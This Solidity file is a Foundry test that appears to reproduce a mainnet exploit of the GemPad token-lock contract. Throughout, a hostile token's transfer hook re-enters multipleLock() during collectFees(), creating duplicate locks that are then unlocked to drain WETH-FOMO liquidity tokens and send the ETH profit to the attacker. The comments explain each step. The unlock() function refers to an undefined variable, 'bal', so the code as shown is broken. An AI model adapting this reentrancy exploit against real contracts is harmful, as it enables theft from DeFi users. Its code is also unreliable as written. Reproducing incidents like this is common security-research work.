GemPad_WETH-FOMO_mainnet_exploit.sol

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;

import "../basetest.sol";
import "../interface.sol";

contract GemPad is BaseTestWithBalanceLog {
    uint256 blocknumToForkFrom = 21420584;
    address hacker = 0xFDd9b0A7e7e16b5Fd48a3D1e242aF362bC81bCaa;

    function setUp() public {
        vm.createSelectFork("mainnet", blocknumToForkFrom);
        fundingToken = address(0);
        deal(hacker, 12 ether);
        
        // Labels based on contract variables
        vm.label(address(0xC36442b4a4522E871399CD717aBDD847Ab11FE88), "UniV3PositionsNFT");
        vm.label(address(0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45), "UniV3Router");
        vm.label(address(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D), "UniV2Router");
        vm.label(address(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f), "UniV2Factory");
        vm.label(address(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2), "WETH");
        vm.label(address(0x9028C2A7f8C8530450549915c5338841Db2a5fEa), "FOMO");
        vm.label(address(0x10B5F02956d242aB770605D59B7D27E51E45774C), "GempadLock");
    }


    function testExploit() public{
        vm.startPrank(hacker);
        uint256 prev_balance = hacker.balance;
        exploit exp_contract = new exploit{value: 12 ether}();
        exp_contract.exploit_it(); // tx1: create pairs, start exploit 
        uint256 timestamp = vm.getBlockTimestamp();
        vm.warp(timestamp+1); // step in next block
        exp_contract.unlock(); // tx2: unlock all Locks, withrdaw profit
        uint256 delta = (hacker.balance-prev_balance)/10**18;
        console.log("Profit in ETH: ", delta);
    }

}


interface IGempadLock {

    function multipleLock(
        address[] calldata owners,
        address token,
        bool isLpToken,
        uint256[] calldata amounts,
        uint40 unlockDate,
        string memory description,
        string memory metaData,
        address projectToken,
        address referrer
    ) external payable returns (uint256[] memory);

    function multipleVestingLock(
        address[] calldata owners,
        uint256[] calldata amounts,
        address token,
        bool isLpToken,
        uint40 tgeDate,
        uint24 tgeBps,
        uint40 cycle,
        uint24 cycleBps,
        string memory description,
        string memory metaData,
        address projectToken,
        address referrer
    ) external payable returns (uint256[] memory);

    function lockLpV3(
        address owner,
        address nftManager,
        uint256 nftId,
        uint40 unlockDate,
        string memory description,
        string memory metaData,
        address projectToken,
        address referrer
    ) external payable returns (uint256 id);

    function unlock(uint256 lockId) external;

    function editLock(
        uint256 lockId,
        uint256 additionalAmount,
        uint40 newUnlockDate
    ) external;

    function collectFees(uint256 lockId) external returns (uint256 amount0, uint256 amount1);

}

contract exploit is Test {
    INonfungiblePositionManager uniV3PositionsNFT = INonfungiblePositionManager(0xC36442b4a4522E871399CD717aBDD847Ab11FE88);
    Uni_Router_V3 uniV3Router = Uni_Router_V3(address(0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45));
    IUniswapV2Router uniV2Router = IUniswapV2Router(payable(address(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D)));
    IUniswapV2Factory uniV2Factory = IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f);
    IWETH weth = IWETH(payable(address(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)));
    IERC20 fomo = IERC20(0x9028C2A7f8C8530450549915c5338841Db2a5fEa);
    IBalancerVault balancer = IBalancerVault(0xBA12222222228d8Ba445958a75a0704d566BF2C8);
    IGempadLock gempad = IGempadLock(0x10B5F02956d242aB770605D59B7D27E51E45774C);
    IUniswapV2Pair pair = IUniswapV2Pair(uniV2Factory.getPair(address(weth), address(fomo)));


    address payable public owner;
    string public name;
    string public symbol;
    uint8 public decimals = 18;
    uint256 public totalSupply;

    uint256[] public multiple_lock_ids;
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);

    constructor() payable {
        owner = payable(msg.sender);
        name = "EVMHACKS";
        symbol = "EVMHACKS";
        mint(address(this), 10000 ether);
    }

    fallback() external payable {
        
    }

    receive() external payable {
        
    }
    // Creating UniV3 pool with malicious token EVMHACKS and Uni2 LP FOMO(project token)-WETH
    function create_LPv3_position() public payable returns(uint256) {
        // eth_swap_amt can be any amount. but the liquidity in the LP3 EVMHACKS-UniV2LP(FOMO-WETH)
        // pool depends on it, so it should be sufficient
        uint256 eth_swap_amt = 1 ether;  
        // get some fomo token
        address[] memory path = new address[](2);
        path[0] = address(weth);
        path[1] = address(fomo);
        uniV2Router.swapExactETHForTokensSupportingFeeOnTransferTokens{value:eth_swap_amt/2}(
            0, // minAmountOut
            path, // swapPath
            address(this), // recipient
            block.timestamp + 99 // deadline
        );
        fomo.approve(address(uniV2Router), type(uint256).max); // approve FOMO for addLiquidityETH()
        uint256 fomo_balance = fomo.balanceOf(address(this));
        // add liquidity to WETH-FOMO pair -> mint LP tokens
        uniV2Router.addLiquidityETH{value:eth_swap_amt/2}(
            address(fomo), // token
            fomo_balance, // amountTokenDesired
            0, // amountTokenMin
            0, // amountETHMin
            address(this), // to
            block.timestamp + 99 // deadline
        );

        // Creating Uni V3 pool with EVMHACKS-LP(WETH-FOMO)
        pair.approve(address(uniV3PositionsNFT), type(uint256).max);
        uniV3PositionsNFT.createAndInitializePoolIfNecessary(
            address(this), // token0
            address(pair), // token1
            500, // fee
            type(uint96).max // sqrtPriceX96
        );
        // mint uniV3 LP NFT
        allowance[address(this)][address(uniV3PositionsNFT)] = type(uint256).max; 
        uint256 weth_fomo_lp_balance = pair.balanceOf(address(this)); // LP balance of exploit contract. 
        // Mint EVMHACKS-LP(WETH-FOMO) LP NFT
        INonfungiblePositionManager.MintParams memory mint_params = INonfungiblePositionManager.MintParams(
            address(this), // token0
            address(pair), // token1
            500, // fee
            -100000, // tickLower
            100000, // tickUpper
            weth_fomo_lp_balance, // amount0Desired
            weth_fomo_lp_balance, // amount1Desired. token1 is exploit token, we can mint infinity EVMHACKS token to self.
            0, // amount0Min
            0, // amount1Min
            address(this), // recipient
            block.timestamp + 99 // deadline
        );
        (uint256 tokenId,,,) = uniV3PositionsNFT.mint(mint_params);
        console.log("Minted token id: ", tokenId);
        return tokenId;
    }


    function mintLpV2() internal returns(uint256){
        // eth_fomo_lp_swap_amt can be any amount, but amount of UniLPv2 WETH-FOMO tokens received depends on it
        // which we will lock through multipleLock(), respectively, the number of unlock() calls
        uint256 eth_fomo_lp_swap_amt = 10 ether;
        address[] memory path = new address[](2);
        path[0] = address(weth);
        path[1] = address(fomo);
        // get some FOMO token
        uniV2Router.swapExactETHForTokensSupportingFeeOnTransferTokens{value:eth_fomo_lp_swap_amt/2}(0, path, address(this), block.timestamp+99);
        uint256 fomo_balance = fomo.balanceOf(address(this));
        // got LP tokens weth-fomo
        (,,uint256 liq) = uniV2Router.addLiquidityETH{value:eth_fomo_lp_swap_amt/2}(address(fomo), fomo_balance, 0, 0, address(this), block.timestamp+99);
        return liq;
    }

    function exploit_it() public payable{
    uint256 nftId = create_LPv3_position(); // get NFT id UniV3 LP EVMHACKS-UniV2(FOMO-WETH)
    uint256 lp_amount = mintLpV2(); // get UniV2 LP WETH-FOMO tokens for multipleLock() in future
    // lock nft LpV3 for pass modifiers isLockOwner() and validLockLPv3() in collectFees()
    uniV3PositionsNFT.approve(address(gempad), nftId);
    uint40 lock_timestamp = uint40(block.timestamp)+1;
    uint256 lock_id = gempad.lockLpV3(address(this), address(uniV3PositionsNFT), nftId, lock_timestamp, "", "", address(this), address(0));

    // approve self token to uniV3Router for swap
    allowance[address(this)][address(uniV3Router)] = type(uint256).max; 
    // approve UniV2LP to gempad for multipleLock in re-entrancy
    pair.approve(address(gempad), type(uint256).max);

    Uni_Router_V3.ExactInputSingleParams memory params = Uni_Router_V3.ExactInputSingleParams(
        address(this),           // tokenIn
        address(pair),           // tokenOut
        500,                     // fee
        address(this),           // recipient
        1_000_000_000,          // amountIn. it can be any amount, the main thing is to generate a fee
        0,                       // amountOutMinimum
        0                        // sqrtPriceLimitX96
    );
    // calculation of iterations of the unlock() calls
    // as long as the LP UniV2(WETH-FOMO) Gempad balance is sufficient
    uint256 lp2_balance_on_gempad = pair.balanceOf(address(gempad));
    uint8 q = uint8(lp2_balance_on_gempad/lp_amount);
    // in the loop, we  swap the EVMHACKS -> UniV2LP(WETH-FOMO) to generate fees
    // that we collect through collectFees() and re-enter in multipleLock()
    for(uint8 i = 0; i<q; i++){
        uniV3Router.exactInputSingle(params);
        gempad.collectFees(lock_id);
    }
    console.log("multiple_lock_ids length: ",multiple_lock_ids.length);
    }

    function unlock() public {
        for(uint8 elem = 0; elem < multiple_lock_ids.length; elem++){
            gempad.unlock(multiple_lock_ids[elem]);
        }

        pair.approve(address(uniV2Router), type(uint256).max);
        uint256 deadline = block.timestamp+99;
        uniV2Router.removeLiquidityETHSupportingFeeOnTransferTokens(address(fomo), bal, 0,0,address(this), deadline);
        owner.transfer(address(this).balance);
    }

    function transfer(address to, uint256 amount) public returns (bool) {
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;

        if(to == 0x10B5F02956d242aB770605D59B7D27E51E45774C && amount == 499999) { // condition for call from gempad.collectFees()
            uint256[] memory amounts = new uint256[](1);
            amounts[0] = pair.balanceOf(address(this));
            address[] memory owners = new address[](1);
            owners[0] = address(this);
            uint40 unlock_date = uint40(block.timestamp)+1;
            uint256[] memory m_lock_id = gempad.multipleLock(owners, address(pair), false, amounts, unlock_date, "", "", address(pair), address(0));
            multiple_lock_ids.push(m_lock_id[0]);
        }

        emit Transfer(msg.sender, to, amount);
        return true;
    }

    function approve(address spender, uint256 amount) public returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transferFrom(address from, address to, uint256 amount) public returns (bool) {
        require(allowance[from][msg.sender] >= amount, "insufficient allowance");
        allowance[from][msg.sender] -= amount;
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        emit Transfer(from, to, amount);
        return true;
    }

    function mint(address to, uint256 amount) public {
        require(msg.sender == owner, "only owner can mint");
        balanceOf[to] += amount;
        totalSupply += amount;
        emit Transfer(address(0), to, amount);
    }
}